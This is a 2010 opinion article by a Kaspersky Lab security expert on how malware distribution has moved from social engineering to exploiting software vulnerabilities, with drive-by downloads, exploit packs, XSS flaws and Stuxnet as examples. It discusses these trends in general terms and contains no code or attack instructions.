The genuine threat to security

Why programme vulnerabilities aren’t going anywhere.

Tags: Cyber crimeKaspersky LabMalware
  • E-Mail
The genuine threat to security
By  Aleks Gostev Published  November 14, 2010

LoveLetter, Mydoom, Storm Worm and several thousand trojans and other programs have been infecting users’ computers for a period of almost 10 years now, most without any particularly complex technologies or devious proliferation methods. Most types of protection can easily be bypassed, providing that the cybercriminal persuades a user of the necessity to launch a given file. Now however, the situation has changed radically.

The main method of infecting a computer these days is to attack it by exploiting a range of different vulnerabilities. This applies to both home and business machines alike.

There are very many reasons why this shift has occurred, but the main one is that  multiple vulnerabilities have recently been discovered in some of the most used progams including Internet Explorer, Microsoft Office, Acrobat Reader and Flash to name but a few.

This has led to the situation that exists today. Currently, the majority of cases of virus infection occur while the user goes about their business on the internet. The now ubiquitous drive-by-download, which has pushed the threat up to new levels. The exploitation of vulnerabilities has become an even more effective means of proliferating viruses than social engineering techniques.

Many software development companies that produce programs containing vulnerabilities appear to struggle when it comes to restructuring their processes, not just from the point of view of reducing the number of vulnerabilities, but also in how efficient they are at addressing the problem.

The security issues facing the business of the creation of other popular internet resources – in particular social networks – is equally woeful.  XSS-vulnerabilities are being detected in some of the most popular resources with alarming frequency, which adds yet another layer of threats to the already sizeable problem being considered.

Thus the exploitation of vulnerabilities in order to spread malware and steal information is now extremely commonplace and not at all the rarity that it once was.
Right now, even cybercriminals without any proper knowledge of programming are able to use ready-made ’exploit packs’ to distribute trojans. This provides them with the ability to reach a much larger number of devices than they could ever have reached through the use of social engineering alone.

However, the most dangerous emerging trend is that of cyber warfare, the most high profile care being the Stuxnet worm that was first detected during the summer of 2010.

Its target was to gain access and information from the systems that manage production of Siemens Simatic WinCC and which work on the SCADA platform. Apart its unusual functionality, the worm exploited a zero-day vulnerability in Windows for the purposes of self-proliferation. This vulnerability was known to the cybercriminals at least half a year before security experts managed to detect it, so we can only guess who has been using it and for what purpose. What is even more alarming is that a conflict of interests between the cybercriminals and governmental institutions can be expected in the field of industrial espionage.

Previously, the scope of the cybercriminals attacks was limited to harassing the everyday user en-masse and only rarely did they carry out successful attacks on financial organisations, payment systems and online shops. Back then the criminals’ main aim was to gain access to user accounts.  However, during the course of its evolution, the world of cybercriminality performed a spiral maneuver which has seen it return to the same point from which it started, but on a new and higher level.

Aleks Gostev is Kaspersky Labs’ chief security expert and specialises in IT and mobile malware.

Add a Comment

Your display name This field is mandatory

Your e-mail address This field is mandatory (Your e-mail address won't be published)

Security code